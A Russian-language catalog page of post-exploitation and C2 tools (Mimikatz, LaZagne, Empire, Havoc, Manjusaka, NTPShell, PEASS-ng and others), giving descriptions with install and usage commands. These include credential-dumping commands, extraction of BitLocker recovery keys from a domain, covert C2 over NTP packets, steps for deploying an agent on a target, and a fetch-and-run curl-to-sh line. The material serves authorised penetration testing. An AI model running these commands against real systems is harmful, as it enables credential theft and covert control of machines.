Каталог инструментов

23 инструментов

Тег: post-exploitation ×

Amatsumara

v2.9.1
Exploitation

Фреймворк для пентестинга на Rust с динамической загрузкой модулей через C FFI. Модули — нативные `.so`-библиотеки: добавить новую возможность = скопировать файл в директорию модулей. Содержит 8 exploit-модулей, …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Amatsumara.git cd Amatsumara cargo build --release # Запуск консоли ./target/release/amatsumara-console # Основные команды REPL: # search <term> -- поиск модулей (по имени, типу, CVE) # search cve:CVE-2024-45337 -- поиск по CVE # use exploit/module-slug -- загрузить модуль # set LHOST 192.168.1.100 -- установить опцию (auto-detect tun0/tap0) # set LPORT 4444 # run -- выполнить # run -j -- в фоне (background job) # sessions -- список сессий # sessions -i 1 -- interact с сессией #1 # Экспорт каталога модулей (JSON) ./target/release/amatsumara-console --list-modules --json | jq '.[].slug'

CDK

v1.5.6
Cloud & Container Security

Инструмент для атак изнутри скомпрометированного контейнера (container escape). Автоматически определяет runtime (Docker/containerd/CRI-O), ищет пути побега: privileged mode, exposed Docker socket, runc CVE. Включает модули для CVE-2019-5736, CVE-2022-0847 (DirtyPipe).

# Скачать статичный бинарник (работает внутри минимального контейнера) https://github.com/cdk-team/CDK/releases ./cdk evaluate --full

Covenant

v0.6
Post-Exploitation

.NET C2-фреймворк с веб-интерфейсом. Агент (Grunt) написан на C# и поддерживает HTTP/HTTPS/SMB. Включает ~150 задач: shellcode injection, token manipulation, lateral movement, credential harvesting. Легко расширяется кастомными задачами.

# Требуется .NET 5 SDK: git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant dotnet run # Веб-интерфейс: https://localhost:7443 # Через Docker: docker build -t covenant . docker run -it -p 7443:7443 -p 80:80 -p 443:443 covenant

Empire

v6.6.0
Post-Exploitation

Постэксплуатационный фреймворк BC Security (форк оригинального PowerShell Empire). Поддерживает PowerShell, Python и C# агентов. Включает 300+ модулей: persistence, privilege escalation, credential harvesting, lateral movement.

# Через Docker (рекомендуется): docker pull bcsecurity/empire:latest docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest # Из исходников (Python 3.8+, poetry): git clone https://github.com/BC-SECURITY/Empire cd Empire sudo ./setup/install.sh # Запуск teamserver: sudo ./ps-empire server # В отдельном терминале — клиент: sudo ./ps-empire client
Post-Exploitation

Python-скрипт для автоматического извлечения BitLocker Recovery Keys из Active Directory через LDAP. Обходит все компьютеры домена, получает ключи восстановления из атрибутов LDAP, поддерживает пагинацию для крупных доменов. Экспорт …

git clone https://github.com/p0dalirius/ExtractBitlockerKeys cd ExtractBitlockerKeys pip install -r requirements.txt # Извлечь ключи со всех компьютеров домена python ExtractBitlockerKeys.py \ -d 'domain.local' \ -u 'Administrator' \ -p 'Password123!' \ --dc-ip 192.168.1.101 # Экспорт в XLSX + JSON python ExtractBitlockerKeys.py \ -d domain.local -u admin -p Pass --dc-ip 192.168.1.101 \ --export-xlsx keys.xlsx \ --export-json keys.json \ --export-sqlite3 keys.db # Использовать LDAPS python ExtractBitlockerKeys.py -d domain.local -u admin -p Pass --use-ldaps

Havoc

Post-Exploitation

Современный C2-фреймворк (Command & Control) с поддержкой кастомных имплантов (Demon), reflective loading, sleep obfuscation, OPSEC-режимов и удобным GUI на Qt. Альтернатива Cobalt Strike с открытым исходным кодом.

# Зависимости (Kali/Ubuntu): sudo apt install -y git build-essential cmake libfontconfig1 libboost-all-dev \ qtbase5-dev qtdeclarative5-dev libqt5websockets5-dev golang-go nasm git clone https://github.com/HavocFramework/Havoc cd Havoc cd teamserver && go mod download && cd .. make ts-build make client-build

LaZagne

v2.4.7
Post-Exploitation

Кросс-платформенный инструмент для извлечения сохранённых паролей из десятков приложений: браузеры, почтовые клиенты, SSH-клиенты, мессенджеры, БД, VPN, git и др. Работает на Windows, Linux и macOS. Применяется в пентесте …

# Python: git clone https://github.com/AlessandroZ/LaZagne cd LaZagne pip install -r requirements.txt python laZagne.py all # Windows-бинарь: # https://github.com/AlessandroZ/LaZagne/releases laZagne.exe all laZagne.exe browsers laZagne.exe wifi

Manjusaka

Post-Exploitation

C2-фреймворк на Rust (агент) и Go (сервер) с веб-панелью управления: сбор системной информации, скриншоты, кейлоггинг, работа с файлами, выполнение команд, извлечение сохранённых паролей браузеров. Получил известность в 2022 …

# Требования: Rust 1.85+, Cargo, Protocol Buffers compiler, OpenSSL dev headers git clone https://git.toolsofthetrade.qzz.io/recovered/manjusaka.git cd manjusaka cargo build --workspace --release # Запуск сервера управления (nps) ./target/release/nps # Веб-панель: https://localhost:33000/manjusaka/static # Дальше в панели: добавить листенер (внешний IP) -> создать проект (callback = внешний IP, # слушатель — только что созданный) -> сгенерировать агент npc1 -> запустить на цели -> # после коннекта агент подгружает расширенный npc2 и открывает обратное соединение.

Mimikatz

v2.2.0-20220919
Post-Exploitation

Инструмент для извлечения паролей, хешей, PIN-кодов и Kerberos-тикетов из памяти Windows. Поддерживает Pass-the-Hash, Pass-the-Ticket, Golden/Silver Ticket, DCSync и другие техники. Стандартный инструмент любого Windows-пентеста и red team операции.

# Сборка из исходников (Visual Studio 2019+): git clone https://github.com/gentilkiwi/mimikatz # Открыть mimikatz.sln, собрать x64 Release # Или скачать готовый бинарь: # https://github.com/gentilkiwi/mimikatz/releases # Запуск и дамп паролей: mimikatz.exe privilege::debug sekurlsa::logonpasswords lsadump::dcsync /domain:corp.local /user:Administrator

Mythic

v3.4.0.5
Post-Exploitation

Модульный C2-фреймворк с веб-интерфейсом, поддерживающий множество агентов (Apollo, Poseidon, Medusa и др.) через Docker-контейнеры. Поддерживает Windows, Linux, macOS. Каждый агент — отдельный плагин, легко расширяется.

# Требуется Docker и Docker Compose: git clone https://github.com/its-a-feature/Mythic cd Mythic sudo ./install_docker_ubuntu.sh sudo make # Установка агента: sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo # Запуск: sudo ./mythic-cli start # Веб-интерфейс: https://localhost:7443

NTPShell

Post-Exploitation

Скрытый C2-канал, передающий команды и данные внутри NTP-пакетов — трафик выглядит как обычная синхронизация времени и слабо детектируется сетевым мониторингом. Написан на C, сервер и клиент в одном …

git clone https://git.toolsofthetrade.qzz.io/recovered/ntpshell.git cd ntpshell gcc ntp.c -lpthread -o ntp # C2-сервер: ./ntp -S # C2-клиент (управляемая машина): ./ntp -C -s <server_addr>

PEASS-ng (LinPEAS)

v20260701-584b0e93
Exploitation

Набор скриптов для поиска путей повышения привилегий. LinPEAS — для Linux/macOS, WinPEAS — для Windows. Автоматически проверяет сотни векторов: • SUID/SGID бинарники • Cron jobs с небезопасными путями …

# LinPEAS — запуск напрямую с GitHub (без сохранения на диск) curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh # Скачать и запустить wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh && ./linpeas.sh # WinPEAS (.exe или .bat) # https://github.com/peass-ng/PEASS-ng/releases # С цветовым выводом и записью в файл ./linpeas.sh -a 2>&1 | tee linpeas_output.txt